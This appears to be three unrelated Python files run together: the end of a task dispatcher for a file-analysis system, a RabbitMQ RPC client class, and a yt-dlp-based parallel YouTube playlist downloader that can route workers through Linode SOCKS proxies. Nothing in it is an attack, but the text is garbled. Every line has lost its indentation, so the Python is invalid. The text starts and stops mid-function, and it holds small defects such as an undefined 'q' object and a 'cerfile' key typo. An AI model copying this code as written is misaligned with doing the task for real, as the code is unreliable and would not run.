w.push(msg)
# ... and append it to this submission's list of cache_keys.
if status[:4] == 'FAIL':
log.debug("Service %s failed (%s): %s",
sender, status, task.message)
if status == 'FAIL_RECOVERABLE':
if self.redispatch('completed_services', sid, srl,
services[sender],
'Recoverable failure', now):
return
if cache_key:
self.errors[sid].append(cache_key)
# We don't send error keys to services. If we want to:
#compressed = compress_riak_key(cache_key, srl)
#entry.task.errors = (entry.task.errors or []) + [compressed]
else:
score = int(task.score or 0)
entry.task.score += score
if not entry.task.max_score or score > entry.task.max_score:
entry.task.max_score = score
self.debug("%s (%d) completed %s", sender, score, srl)
if cache_key:
self.results[sid].append(cache_key)
compressed = compress_riak_key(cache_key, srl)
entry.task.results = (entry.task.results or []) + [compressed]
entry.completed_services[stage][sender] = svc
self.service_manager.update_last_result_at(sender, now)
entry.acknowledged_services[stage].pop(sender, None)
entry.dispatched_services[stage].pop(sender, None)
# If the service said to drop this entry clear all services.
if not task.ignore_filtering and task.filter == 'drop':
self.debug("%s (%s) said to DROP %s", sender, stage, srl)
entry.task.filter = 'drop'
for i, s in enumerate(entry.dispatched_services):
if i > stage and s:
s.clear()
for i, s in enumerate(entry.outstanding_services):
if i > stage and s:
s.clear()
if status[:4] != 'FAIL':
# Record any children we should be seeing if we haven't.
for child in task.extracted or []:
if child[1] and \
not child[1] in entry.outstanding_children and \
not child[1] in entry.completed_children and \
not child[1] in self.completed[sid] and \
not child[1] in entries[sid]:
entry.extracted_children[child[1]] = True
# Setup a child timeout.
seconds = config.core.dispatcher.timeouts.child
# Add the timeout to the end of its respective list.
child_timeout = self.child_timeout
lst = child_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, child[1], now + seconds))
child_timeout[seconds] = lst
UpdateEntry(entry, now)
def start(self):
global counts # pylint: disable=W0603
# Publish counters to the metrics sink.
counts = counter.AutoExportingCounters(
name='dispatcher-%s' % self.shard,
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink(),
counter_type='dispatcher')
counts.start()
self.service_manager.start()
# This starts a thread that polls for messages with an exponential
# backoff, if no messages are found, to a maximum of one second.
minimum = -6
maximum = 0
self.running = True
threading.Thread(target=self.heartbeat).start()
for _ in range(8):
threading.Thread(target=self.writer).start()
signal.signal(signal.SIGINT, self.interrupt)
time.sleep(2 * int(config.system.update_interval))
exp = minimum
while self.running:
if self.poll(len(self.entries)):
exp = minimum
continue
if self.drain and not self.entries:
break
time.sleep(2**exp)
exp = exp + 1 if exp < maximum else exp
self.check_timeouts()
counts.stop()
def submitted(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
psrl = task.psrl
sid = task.sid
srl = task.srl
if task.is_initial():
self.debug("Parent submitted: %s/%s", sid, srl)
task.depth = 0
# Stamp the task with the current time.
task.received = now
else:
if task.dispatch_queue != self.response_queue:
raise Exception("Queue is %s. Should be %s." % \
(task.dispatch_queue, self.response_queue))
try:
# If we learned about the child in the parent's response,
# remove it from the list of extracted children (it will
# now be in outstanding).
entries[sid][psrl].extracted_children.pop(srl, None)
except: #pylint: disable=W0702
pass
self.debug("Child of %s/%s submitted: %s", sid, psrl, srl)
task.depth += 1
if task.profile:
log.info('%s Graph: "%s/%s" -> "%s";',
sid, psrl, task.submitter, srl)
# Stamp this dispatcher's queue on the task to make sure
# responses and resubmissions will come to this dispatcher.
task.dispatch_queue = self.response_queue
# If this is the initial (root) submission save the scan object.
if not sid in entries:
if psrl:
# This is a child but we don't know about the parent.
log.debug("Parent (%s) does not exist for sid/srl: %s/%s",
psrl, sid, srl)
return
entries[sid] = {}
self.completed[sid] = {}
self.errors[sid] = []
self.results[sid] = []
self.score[sid] = None
submission = entries[sid]
if srl in submission or srl in self.completed.get(sid, {}):
return
entry = CreateEntry(self, task, now)
if entry is None:
return
if task.profile:
log.info('%s Graph: "%s" [label="%s"]', sid, srl,
''.join((srl[:4], '...', srl[-4:])))
submission[srl] = entry
UpdateEntry(entry, now)
# It is possible to combine a submit and watch message.
if task.watch_queue:
self.watch(task)
def watch(self, task):
queue = task.watch_queue
sid = task.sid
# Make sure this submission exists.
watchers = self.watchers.get(sid, {})
# Bail if we have a watcher with the same name for this sid.
if queue in watchers:
return
ttl = 0
try:
ttl = config.core.dispatcher.timeouts.watch_queue
except: # pylint: disable=W0702
pass
w = NamedQueue(queue, ttl=ttl)
errors = self.errors.get(sid, None)
results = self.results.get(sid, None)
if results is None and errors is None:
# TODO: Should we send UNKNOWN.
w.push({'status': 'STOP'})
return
watchers[queue] = w
self.watchers[sid] = watchers
# Send all cache keys to the newly created queue.
# Afterward they will be sent as they are received.
w.push({'status': 'START'})
if results:
w.push(*[{'status': 'OK', 'cache_key': c} for c in results])
if errors:
w.push(*[{'status': 'FAIL', 'cache_key': c} for c in errors])
def writer(self):
queue = {}
store = forge.get_datastore()
while self.running:
try:
msg = self.storage_queue.pop(timeout=1)
if not msg:
if self.drain:
break
continue
response = None
if msg['type'] == 'complete':
key = msg['filescore_key']
if key:
store.save_filescore(
key, msg['expiry'], {
'psid': msg['psid'],
'sid': msg['sid'],
'score': msg['score'],
'time': msg['now'],
}
)
elif msg['type'] == 'error':
name, response = msg['name'], msg['response']
response.cache_key = \
store.save_error(name, None, None, response)
q.send_raw(response.as_dispatcher_response())
elif msg['type'] == 'finalize':
store.finalize_submission(
msg['sid'], msg['classification'],
msg['errors'], msg['results'], msg['score']
)
completed_queue = msg['completed_queue']
if completed_queue:
cq = queue.get(completed_queue, None)
if not cq:
cq = NamedQueue(completed_queue)
queue[completed_queue] = cq
cq.push(msg['raw'])
# Send complete message to any watchers.
for w in msg['watchers'].itervalues():
w.push({'status': 'STOP'})
else:
log.warning("Unhandled message type: %s",
msg.get('type', '<unknown>'))
except riak.RiakError:
msg['retries'] = retries = msg.get('retries', 0) + 1
if retries > 5:
log.exception("Max retries exceeded")
continue
self.storage_queue.push(msg)
log.exception("Problem doing %s", msg.get('type', 'unknown'))
except Exception: # pylint:disable=W0702
log.exception('Problem in writer')
# TODO: Should we sleep for a bit here to avoid flailing?
store.close()
def explain_state(self, task):
log.info('Got explain_state message.')
nq = NamedQueue(task.watch_queue)
submission = self.entries.get(task.sid, None)
if submission:
has_timeout = False
for v in self.ack_timeout.itervalues():
for t in v:
if t.sid == task.sid:
has_timeout = True
for v in self.service_timeout.itervalues():
for t in v:
if t.sid == task.sid:
has_timeout = True
if not has_timeout:
nq.push({
'srl': 0,
'message': 'No timeouts for this submission!',
'depth': 0,
})
for entry in submission.itervalues():
if not entry.task.psrl:
explain(entry, nq)
nq.push(False)
def get_system_time(self, task):
nq = NamedQueue(task.watch_queue)
nq.push({'time': time.time()})
def list_service_info(self, task):
NamedQueue(task.watch_queue).push(self._service_info())
def outstanding_services(self, task):
nq = NamedQueue(task.watch_queue)
outstanding = {}
submission = self.entries.get(task.sid, None)
if submission:
for entry in submission.itervalues():
get_outstanding_services(entry, outstanding)
nq.push(outstanding)
def outstanding_submissions(self, task):
nq = NamedQueue(task.watch_queue)
nq.push({'sids': self.entries.keys()})
def get_outstanding_services(entry, outstanding):
o = entry.outstanding_services
d = entry.dispatched_services
a = entry.acknowledged_services
stage = entry.task.stage
if stage == DONE:
return
for name in o[stage].keys() + d[stage].keys() + a[stage].keys():
outstanding[name] = outstanding.get(name, 0) + 1
for child in entry.outstanding_children.itervalues():
get_outstanding_services(child, outstanding)
def explain(entry, nq, depth=0):
outstanding_services = entry.outstanding_services
dispatched_services = entry.dispatched_services
acknowledged_services = entry.acknowledged_services
stage = entry.task.stage
if stage != DONE:
nq.push({
'srl': entry.task.srl,
'message': 'Stage: ' + str(stage),
'depth': depth,
})
if outstanding_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Undispatched: ' + \
','.join([x for x in outstanding_services[stage]]),
'depth': depth,
})
elif dispatched_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Awaiting acks for: ' + \
','.join([x for x in dispatched_services[stage]]),
'depth': depth,
})
elif acknowledged_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Awaiting results for: ' + \
','.join([x for x in acknowledged_services[stage]]),
'depth': depth,
})
for csrl in entry.extracted_children:
child = entry.dispatcher.entries[entry.task.sid].get(csrl, None)
if not child:
nq.push({
'srl': entry.task.srl,
'message': 'Extracted child %s not found' % csrl,
'depth': depth,
})
else:
nq.push({
'srl': entry.task.srl,
'message': 'Extracted child: ',
'depth': depth,
})
explain(child, nq, depth+1)
for child in entry.outstanding_children.itervalues():
nq.push({
'srl': entry.task.srl,
'message': 'Outstanding child: ',
'depth': depth,
})
explain(child, nq, depth+1)
class DispatchClient(object):
@classmethod
def _send_control_queue_call(cls, shard, state, **kw):
name = reply_queue_name(state)
kw.update({
'state': state,
'watch_queue': name,
})
t = Task({}, **kw)
forge.get_control_queue('control-queue-' + str(shard)).push(t.raw)
nq = NamedQueue(name)
return nq.pop(timeout=5)
@classmethod
def get_system_time(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'get_system_time')
return result.get('time', None) if result else None
@classmethod
def list_service_info(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'list_service_info')
#return result.get('services', None) if result else None
return result
@classmethod
def get_outstanding_services(cls, sid):
shard = forge.determine_dispatcher(sid)
result = cls._send_control_queue_call(shard, 'outstanding_services', sid=sid)
return result
@classmethod
def list_outstanding(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'outstanding_submissions')
return result.get('sids', None) if result else None
|
amqp.py
|
# --coding:utf-8--
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import time
import ssl
import threading
import amqpstorm
import json
import datetime
from amqpstorm import Message
class AMQPConn(object):
def __init__(self, host, username, password, routing, lock, tls_config=None):
"""
:param host: RabbitMQ Server e.g. 127.0.0.1
:param username: RabbitMQ Username e.g. guest
:param password: RabbitMQ Password e.g. guest
:return:
"""
# TBD to support SSL
self.host = host
self.username = username
self.password = password
self.connection = None
self.channel = None
self.resp_queue = None
self.response = None
self.correlation_id = None
self.on_request = routing
self.thread_main = None
self.request_callback = None
self.notif_callback = None
self.tls_config = tls_config
self.use_ssl = False
if self.tls_config:
if self.tls_config.get('tls', None):
self.use_ssl = True
self.lock = lock
self._stopped = threading.Event()
self.setup()
def _on_request(self, message):
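        # Incoming message handler: if the message carries a reply_to queue
        # it is an RPC-style request, so run request_callback and publish
        # the JSON result back with the caller's correlation_id; otherwise
        # treat it as a one-way notification.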
json_in = json.loads(message.body)
# print(json_str)
if message.reply_to:
if self.request_callback:
result = self.request_callback(json_in)
properties = {
'correlation_id': message.correlation_id
}
response = Message.create(
message.channel, json.dumps(
result, ensure_ascii=False), properties)
response.content_type = 'application/json'
response.publish(message.reply_to)
else:
if self.notif_callback:
self.notif_callback(json_in)
message.ack()
def _on_response(self, message):
if self.correlation_id != message.correlation_id:
return
self.response = message.body
def setup(self):
if self.use_ssl:
self.connection = amqpstorm.Connection(
self.host,
self.username,
self.password,
port=5671,
ssl=True,
ssl_options={
'ssl_version': ssl.PROTOCOL_TLSv1_2,
'cert_reqs': ssl.CERT_REQUIRED,
'keyfile': self.tls_config.get('keyfile'),
'certfile': self.tls_config.get('cerfile'),
'ca_certs': self.tls_config.get('cafile'),
}
)
else:
self.connection = amqpstorm.Connection(self.host,
self.username,
self.password)
self.channel = self.connection.channel()
result = self.channel.queue.declare(exclusive=True)
self.resp_queue = result['queue']
self.channel.basic.consume(self._on_response, no_ack=True,
queue=self.resp_queue)
self.channel.queue.declare(queue=self.on_request)
self.channel.queue.purge(queue=self.on_request)
self.channel.basic.qos(prefetch_count=100)
self.channel.basic.consume(self._on_request, queue=self.on_request)
def request(self, routing_key, req_json, timeout=0):
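        # Synchronous RPC over AMQP: publish req_json with reply_to set to
        # our exclusive response queue, then poll process_data_events()
        # until _on_response matches our correlation_id or the optional
        # timeout (in seconds) expires.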
self.lock.acquire()
self.response = None
message = Message.create(
self.channel, body=json.dumps(
req_json, ensure_ascii=False))
message.reply_to = self.resp_queue
message.content_type = 'application/json'
self.correlation_id = message.correlation_id
message.publish(routing_key=routing_key)
start = datetime.datetime.now()
while not self.response:
self.channel.process_data_events()
time.sleep(0.01)
now = datetime.datetime.now()
if timeout > 0 and (now - start) >= datetime.timedelta(0, timeout):
break
response = self.response
self.lock.release()
return response
def publish(self, routing_key, req_json):
message = Message.create(
self.channel, body=json.dumps(
req_json, ensure_ascii=False))
message.content_type = 'application/json'
message.publish(routing_key=routing_key)
def start(self, daemon):
self._stopped.clear()
if daemon is True:
self.thread_main = threading.Thread(
target=self._thread_main, args=(None,))
self.thread_main.setDaemon(True)
self.thread_main.start()
else:
self.channel.start_consuming()
def stop(self):
self._stopped.set()
self.channel.stop_consuming()
if self.thread_main:
self.thread_main.join()
self.channel.close()
self.connection.close()
def set_callback(self, request_callback, notif_callback):
self.request_callback = request_callback
self.notif_callback = notif_callback
def _thread_main(self, *args, **kwargs):
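        # Consumer loop: keep start_consuming() running until stop() is
        # called; on an AMQPError, tear down the channel and connection and
        # retry setup() once a second until the broker is reachable again.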
need_reconnect = False
while self._stopped.is_set() is not True:
try:
self.channel.start_consuming()
except amqpstorm.AMQPError:
if self._stopped.is_set() is True:
break
need_reconnect = True
pass
if need_reconnect is True:
self.channel.stop_consuming()
self.channel.close()
self.channel = None
self.connection.close()
self.connection = None
while True:
try:
self.setup()
break
except BaseException:
time.sleep(1)
need_reconnect = False
|
downloader.py
|
"""
Fancy parallel downloader for a pre-
retrieved YoutubeDL() info_dict JSON.
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣠⣤⣤⣄⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠤⠖⠊⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠙⠲⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡤⠊⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢢⠀⠀⠀⠀⠀⢳⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣸⠁⠀⠀⠀⠀⠀⠀⠀⠱⡀⠀⠀⠀⠀⠀⠀⠀⡀⠈⠀⡀⠀⠀⠀⠈⡇⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡏⠀⠀⠀⠀⠀⠀⠀⠀⡰⠁⠀⠀⠀⠀⠀⠀⠀⠘⡆⡜⠁⠀⠀⠀⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠸⡀⠀⠀⠀⠀⠀⣀⣤⡂⠀⠇⠱⠀⡀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢇⠀⠀⠀⠀⠀⠀⠀⠀⠈⢄⡀⢠⣟⢭⣥⣤⠽⡆⠀⡶⣊⣉⣲⣤⢀⡞⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⡀⠀⠐⠂⠘⠄⣈⣙⡡⡴⠀⠀⠙⣄⠙⣛⠜⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠈⢦⡀⠀⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠄⠊⠀⠀⠀⠀⡸⠛⠀⠀⠀⢸⠆⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠈⠓⠦⢄⣘⣄⠀⠀⠀⠀⠀⠀⠀⡠⠀⠀⠀⠀⣇⡀⠀⠀⣠⠎⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠁⠈⡟⠒⠲⣄⠀⠀⡰⠇⠖⢄⠀⠀⡹⡇⢀⠎⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡇⠀⠀⡇⠀⠀⠹⠀⡞⠀⠀⢀⠤⣍⠭⡀⢱⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣀⣀⣠⠞⠀⠀⢠⡇⠀⠀⠀⠀⠁⠀⢴⠥⠤⠦⠦⡼⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣀⣤⣴⣶⣿⣿⡟⠁⠀⠋⠀⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠀⠑⣠⢤⠐⠁⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⢸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠬⠥⣄⠀⠀⠈⠲⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠙⠦⣄⠀⠀⠀⠀⠀⠀⠀⠀⠈⢳⠀⠀⢀⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠒⠦⠤⢤⣄⣀⣠⠤⢿⣶⣶⣿⣿⣿⣶⣤⡀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡼⠁⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣦⣤⣤⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
NOTE: Not my fault if your IP gets rate-
limited or throttled by YouTube. With
great power comes great responsibility!
ALSO NOTE: Have yet to test on other
video sites besides YouTube...
"""
import argparse
import json as j
from multiprocessing import cpu_count, Process, Queue
from multiprocessing.queues import Empty, Full
import os
from random import randint
from time import sleep
import typing
from yt_dlp import YoutubeDL
from yt_dlp.utils import encodeFilename, sanitize_path
from yt_dlp.extractor.common import InfoExtractor as IE
from .linode import LinodeProxy
from .proxy import Proxy
from .socks import SocksProxy
from .util import die, eprint, runcmd
def do_download(
entry_q: Queue,
opts: argparse.Namespace,
sub_langs: [str],
proxy: Proxy = None,
):
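    # Download worker: pull playlist entries off entry_q, create and enter a
    # per-video directory, persist the entry JSON and description, and run
    # yt-dlp on the watch URL, using the subtitle-enabled YoutubeDL instance
    # when the resume pass flagged tux_get_subs.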
sub_opts = {
"writesubtitles": True,
"writeautomaticsub": True,
}
if sub_langs[0] == "all":
sub_opts["allsubtitles"] = True
else:
sub_opts["subtitleslangs"] = sub_langs
yt_opts = {
"noprogress": True,
"http_chunk_size": 10485760,
"writethumbnail": True,
"ignoreerrors": True,
"format_sort": IE.FormatSort.ytdl_default,
"extractor_args": {
"youtube": {"player_skip": ["webpage"]},
"youtubetab": {"skip": ["webpage"]},
},
}
if proxy is not None:
yt_opts["proxy"] = proxy.proxy_url
if opts.all_thumbnails:
yt_opts["write_all_thumbnails"] = True
y = YoutubeDL({**yt_opts, **sub_opts})
y_nosubs = YoutubeDL(yt_opts)
while True:
try:
try:
entry = entry_q.get(block=True, timeout=0.5)
except Empty:
break
try:
id_dir = entry["id"]
except TypeError:
continue
try:
os.mkdir(id_dir)
except FileExistsError:
pass
try:
os.chdir(id_dir)
except OSError as oserr:
eprint("[WARN]: Skipping {} due to {}".format(id_dir, oserr))
continue
nfo_path = "playlist_entry.json"
if not (os.path.exists(nfo_path) and os.path.isfile(nfo_path)):
nfo_file = open(nfo_path, mode="w")
nfo_file.write(j.dumps(entry, sort_keys=True, indent=2))
nfo_file.close()
desc_path = "description"
if not (os.path.exists(desc_path) and os.path.isfile(desc_path)):
desc_file = open(desc_path, mode="w")
desc_file.write(entry["description"])
desc_file.close()
dl_url = "https://www.youtube.com/watch?v=" + entry["id"]
try:
if entry["tux_get_subs"] is True:
y.download([dl_url])
else:
y_nosubs.download([dl_url])
except KeyError:
y.download([dl_url])
os.chdir("..")
sleep(2)
except KeyboardInterrupt:
break
if proxy is not None:
if proxy.exclusive:
print(
"[INFO]: Cleaning up worker {}'s exclusive proxy".format(
os.getpid()
)
)
proxy.cleanup()
print("[INFO]: Worker {} done...".format(os.getpid()))
def get_entries(entries: dict, entry_q: Queue):
try:
for entry in entries:
while True:
try:
entry_q.put(entry, block=True, timeout=0.2)
break
except Full:
pass
except KeyboardInterrupt:
pass
entry_q.close()
def check_subs_done(entry: dict, basename: str, langs: [str] = None) -> bool:
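    # A video's subtitles are considered done when, for every requested
    # language, at least one of the automatic-caption extensions listed in
    # the info dict already exists next to the video file.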
if langs is None:
langs = entry["automatic_captions"].keys()
for lang in langs:
subbase = basename + "." + lang
lang_sub_exists = False
for subentry in entry["automatic_captions"][lang]:
sfname = subbase + "." + subentry["ext"]
if os.path.exists(sfname) and os.path.isfile(sfname):
lang_sub_exists = True
break
if not lang_sub_exists:
return False
return True
def check_video_done(entry: dict, basename: str) -> bool:
for ext in (".mp4", ".webm", ".mkv"):
vfname = basename + ext
if os.path.exists(vfname) and os.path.isfile(vfname):
return True
return False
def check_dl(in_q: Queue, out_q: Queue):
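    # Resume worker: for each playlist entry, inspect its id directory and
    # decide whether the video (and its subtitles) are already on disk.
    # Entries that still need downloading are forwarded to out_q, tagged
    # with a tux_get_subs flag so do_download knows whether to fetch subs.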
while True:
try:
try:
entry = in_q.get(block=True, timeout=0.5)
except Empty:
break
try:
id_dir = entry["id"]
except TypeError:
continue
if os.path.isdir(id_dir):
try:
os.chdir(id_dir)
except OSError as oserr:
eprint(
"[WARN]: Skipping {} due to {}".format(id_dir, oserr)
)
continue
elif os.path.exists(id_dir):
                eprint(
                    ("[WARN]: Not downloading https://youtube.com/watch?v={} "
                     "because {} exists and is not a directory!").format(
                        entry["id"], id_dir
                    )
                )
continue
else:
out_q.put(entry)
continue
nfo_path = "playlist_entry.json"
if not (os.path.exists(nfo_path) and os.path.isfile(nfo_path)):
os.chdir("..")
out_q.put(entry)
continue
desc_path = "description"
if not (os.path.exists(desc_path) and os.path.isfile(desc_path)):
desc_file = open(desc_path, mode="w")
desc_file.write(entry["description"])
desc_file.close()
y = YoutubeDL({"ignoreerrors": True})
basename = os.path.splitext(
sanitize_path(encodeFilename(y.prepare_filename(entry)))
)[0]
try:
if check_subs_done(entry, basename):
entry["tux_get_subs"] = False
else:
entry["tux_get_subs"] = True
except KeyError:
eprint(
"[WARN]: Couldn't find auto subs for {} in info".format(
entry["id"]
)
)
entry["tux_get_subs"] = False
if not (check_video_done(entry, basename)):
out_q.put(entry)
os.chdir("..")
continue
os.chdir("..")
except KeyboardInterrupt:
break
def testworker(in_q: Queue):
i = 0
while not in_q.empty():
try:
entry = in_q.get(block=True, timeout=0.5)
except Empty:
break
try:
i += 1
print("{}: ".format(i), end="")
print(entry["id"])
acs = entry["automatic_captions"]
except KeyError:
eprint("couldn't get caps on vid {}".format(entry["id"]))
def workers_alive(workers: [Process]):
for worker in workers:
if worker.is_alive():
return True
return False
def resume_cleanup(workers: [Process], q_worker: Process):
print("\n[CLEANUP]: Cleaning up...")
for worker in workers:
if worker.is_alive():
print("[CLEANUP]: Terminating resume worker {}".format(worker.pid))
worker.terminate()
print("[CLEANUP]: Terminating queue worker {}".format(worker.pid))
q_worker.terminate()
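# Resume pre-pass: fan the playlist entries out to up to cpu_count() check_dl
# processes and collect the entries that still need downloading from out_q.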
def resume_preprocess(entries: [dict]) -> list:
ncpus = cpu_count()
n_workers = ncpus if len(entries) >= ncpus else len(entries)
in_q = Queue(n_workers)
out_q = Queue(len(entries))
iq_builder = Process(target=get_entries, args=(entries, in_q))
workers = []
try:
iq_builder.start()
for n in range(n_workers):
workers.append(Process(target=check_dl, args=(in_q, out_q)))
while not in_q.full():
sleep(0.2)
for w in workers:
w.start()
unfinished_entries = []
while workers_alive(workers):
try:
unfinished_entries.append(out_q.get(block=True, timeout=2))
except Empty:
continue
except KeyboardInterrupt:
resume_cleanup(workers, iq_builder)
return []
if iq_builder.is_alive():
iq_builder.terminate()
die("[BUG]: Workers didn't verify whole list! Exiting...")
return unfinished_entries
def validate_linode_proxy(proxy: LinodeProxy) -> LinodeProxy:
if not proxy.start():
eprint(
"[WARN]: "
+ "Proxy, validation failed, deleting and rebuilding Linode..."
)
port = proxy.proxy_port
proxy.cleanup()
proxy = LinodeProxy(proxy_port=port)
return validate_linode_proxy(proxy)
else:
print(
"[INFO]: SOCKS validation succeeded on port {} from ID {}".format(
proxy.proxy_port, proxy.info["id"]
)
)
return proxy
def cleanup(workers: [Process], linode_proxies: [LinodeProxy]) -> None:
if len(workers) > 0:
for worker in workers:
if worker.is_alive():
print(
"[CLEANUP]: Terminating download worker {}".format(
worker.pid
)
)
worker.terminate()
if len(linode_proxies) > 0:
print("[CLEANUP]: Deleting Linode proxies...")
for proxy in linode_proxies:
proxy.cleanup()
def parse_args(args: list, name: str):
parser = argparse.ArgumentParser(prog=name)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
"-L",
"--linode-proxy",
action="store_true",
help="Give each worker a Linode SOCKS proxy. Assumes you have already "
+ "setup the linode-cli with an API key and default settings. See "
+ "https://www.linode.com/docs/guides/linode-cli/ "
+ "for more information.",
)
group.add_argument(
"-S",
"--socks-proxy",
type=str,
default=None,
help="Run workers through a SOCKS proxy. Requires a fully-qualified "
+ 'proxy URL (e.g. "socks5://user:pass@hostname:port" or '
+ '"socks5://hostname:port").\n'
+ "Be mindful of your shell's history file when entering passwords on "
+ "the command line. If this script encounters a proxy that requires "
+ "authentication, it will prompt the user for a password "
+ "interactively, as well.",
)
parser.add_argument(
"-p",
"--proxy-base-port",
type=int,
default=1337,
help="Port number that local Linode-powered proxy ports are derived "
+ "from, does nothing without "
+ "enabling --linode-proxy (aka. -L).",
)
parser.add_argument(
"--resume-dump",
action="store_true",
help="Dump resume info_dict to JSON (for debugging).",
)
parser.add_argument(
"-n",
"--n-workers",
type=int,
default=8,
help="Number of parallel download workers",
)
parser.add_argument(
"-l",
"--subtitle-langs",
type=str,
default="en",
help="Comma-delimited list of subtitle languages to download; "
+ 'pass "all" to download all auto captions. '
+ 'Downloads "en" subtitles by default.',
)
parser.add_argument(
"-T",
"--all-thumbnails",
action="store_true",
help="Download all thumbnails instead of just the best one.",
)
parser.add_argument(
"playlist_json",
type=argparse.FileType("r"),
help="JSON-ified playlist file to download",
)
return parser.parse_args(args=args)
def main(args: [str], name: str) -> int:
opts = parse_args(args=args, name=name)
sub_langs = opts.subtitle_langs.split(",")
n_workers = opts.n_workers
key_path = os.path.abspath("./proxy_key")
pubkey_path = os.path.abspath(key_path + ".pub")
if not (
os.path.isfile(pubkey_path)
or os.path.isfile(os.path.splitext(pubkey_path)[0])
):
print("[INFO]: Creating SSH key for Linode proxying...")
print(runcmd('ssh-keygen -f "{}" -N ""'.format(key_path)).decode())
info_dict = j.loads(opts.playlist_json.read())
opts.playlist_json.close()
print("[INFO]: Starting squid-dl...")
dirname = info_dict["title"]
print('[INFO]: saving videos to "{}" directory'.format(dirname))
if not (os.path.exists(dirname) and os.path.isdir(dirname)):
os.mkdir(dirname)
else:
playlist_size = len(info_dict["entries"])
info_dict["entries"] = resume_preprocess(info_dict["entries"])
if len(info_dict["entries"]) == 0:
print("[WARN]: Nothing left to download, exiting...")
return 1
print(
"Resuming download of {}/{} videos...".format(
len(info_dict["entries"]), playlist_size
)
)
if opts.resume_dump:
rdump = open(info_dict["title"] + ".resume.json", mode="w")
rdump.write(j.dumps(info_dict, sort_keys=True, indent=2))
rdump.close()
n_entries = len(info_dict["entries"])
n_workers = n_workers if n_workers < n_entries else n_entries
entry_q = Queue(n_workers)
entry_getter = Process(
target=get_entries, args=(info_dict["entries"], entry_q)
)
entry_getter.start()
    base_port = opts.proxy_base_port
workers = []
linode_proxies = []
if opts.socks_proxy is not None:
socks_proxy = SocksProxy(url=opts.socks_proxy)
try:
for n in range(n_workers):
port = base_port + n
if opts.linode_proxy:
linode_proxies.append(
LinodeProxy(proxy_port=port, pubkey_path=pubkey_path)
)
worker_args = (entry_q, opts, sub_langs, linode_proxies[n])
elif opts.socks_proxy is not None:
worker_args = (entry_q, opts, sub_langs, socks_proxy)
else:
worker_args = (entry_q, opts, sub_langs)
workers.append(
Process(
target=do_download,
args=worker_args,
)
)
if len(linode_proxies) > 0:
if not (
os.path.isfile(pubkey_path)
or os.path.isfile(os.path.splitext(pubkey_path)[0])
):
die(
'[ERROR]: SSH key file "{}" does not exist!'.format(
pubkey_path
)
)
print("[INFO]: Waiting for Linodes to come online", end="")
nodes_to_ping = list(range(n_workers))
while len(nodes_to_ping) > 0:
print(".", end="")
temp_list = []
for proxy_idx in nodes_to_ping:
